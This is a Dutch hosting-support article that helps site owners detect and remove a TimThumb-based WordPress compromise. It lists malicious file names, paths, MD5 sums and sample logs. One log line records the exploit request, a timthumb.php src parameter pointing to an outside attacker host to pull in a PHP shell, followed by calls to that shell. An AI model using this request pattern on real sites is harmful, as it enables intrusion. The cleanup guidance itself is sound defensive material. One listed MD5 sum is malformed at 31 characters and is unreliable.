Inbreuk op WordPress: TimThumb

TimThumb is een tool die door WordPress-thema's en plug-ins wordt gebruikt om de grootte van afbeeldingen aan te passen. Oude versies van TimThumb bevatten een zwakke plek in de beveiliging waardoor aanvallers kwaadaardige ("slechte") bestanden vanaf een andere website kunnen uploaden. Via het eerste slechte bestand kan de aanvaller dan meer kwaadaardige bestanden uploaden naar het hostingaccount.

Je vindt meer informatie over inbreuken en hoe je ze kunt oplossen in Wat als mijn website is gehackt?.

Tekenen die erop wijzen dat je website gehackt is

Naast de tekenen die in Wat als mijn website is gehackt? worden vermeld, kun je zien dat je site is getroffen door de volgende specifieke inbreuk als je account bestanden met de volgende patronen bevat in een plug-in-map:

  • external_[md5-hash].php — bijvoorbeeld: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5-hash].php — bijvoorbeeld: 7eebe45bde5168488ac4010f0d65cea8.php

Je kunt voorbeelden van mogelijke md5-hashes vinden in de paragraafMD5SUMS van bekende kwaadaardige bestanden in dit artikel.

Je kunt de volgende bestanden mogelijk ook vinden in de hoofdmap van je website (meer info):

  • x.txt
  • logx.txt

Oplossingen

Je moet alle getroffen en slechte bestanden verwijderen. Voordat je iets verwijdert, raden we aan een back-up van je website te maken (meer info).

Slechte bestanden vinden

De slechte bestanden die eerst worden geüpload via de kwetsbaarheid in TimThumb bevinden zich meestal in een van de volgende mappen. Je vindt ze in de map /theme of /plugin, waarin het kwetsbare TimThumb-bestand staat.

  • /tmp
  • /cache
  • /images

Voorbeelden van locaties van slechte bestanden:

[webroot]/wp-content/themes/[thema met kwetsbare TimThumb]/cache/images/

Voorbeelden van namen van slechte bestanden in deze locaties:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

De bestanden x.txt en logx.txt bevatten informatie over het tijdstip waarop een slecht bestand is aangemaakt via de zwakke plek in TimThumb en waar het slechte bestand zich bevindt in het hostingaccount. Met deze informatie kun je beter bepalen welke bestanden moeten worden verwijderd en waar je ze kunt vinden. Het is echter niet waarschijnlijk dat je hier de volledige lijst met bestanden vindt die moeten worden verwijderd.

Een voorbeeld:

Day : Thu, 11 Apr 2013 06:21:15 -0700
IP: X.X.X.X
Browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[thema met kwetsbare TimThumb]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Te verwijderen bestanden

Nadat je een back-up hebt gemaakt van je site, verwijder je de volgende bestanden:

  • x.txt
  • logx.txt
  • external_[md5-hash].php — bijvoorbeeld: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5-hash].php — bijvoorbeeld: 7eebe45bde5168488ac4010f0d65cea8.php
  • Andere kwaadaardige PHP-bestanden die worden gevonden bij de bestanden met md5-hash-namen.

Je kunt dit doen via FTP (meer info) of via de bestandsmanager in het beheerpaneel van je hostingaccount (meer info).

Doe ook het volgende:

  • Werk al je thema's en plug-ins bij naar de nieuwste versie.
  • Vervang alle versies van TimThumb.php door de nieuwste versies die je hier kunt vinden.

Technische info

Voorbeeld van HTTP-logboeken

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[thema met kwetsbare TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[thema met kwetsbare TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[thema met kwetsbare TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[thema met kwetsbare TimThumb]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

MD5SUMS van bekende kwaadaardige bestanden

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Aanvullende kwaadaardige bestanden

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Was dit artikel nuttig?
Hartelijk dank voor je feedback. Gebruik het supporttelefoonnummer of de bovenstaande chatoptie als je een vertegenwoordiger van de afdeling Klantenondersteuning wilt spreken.
Fijn dat we konden helpen! Kunnen we nog iets voor je doen?
Dat spijt ons. Vertel ons wat je verwarrend vond of waarom je probleem niet is opgelost via de geboden oplossing.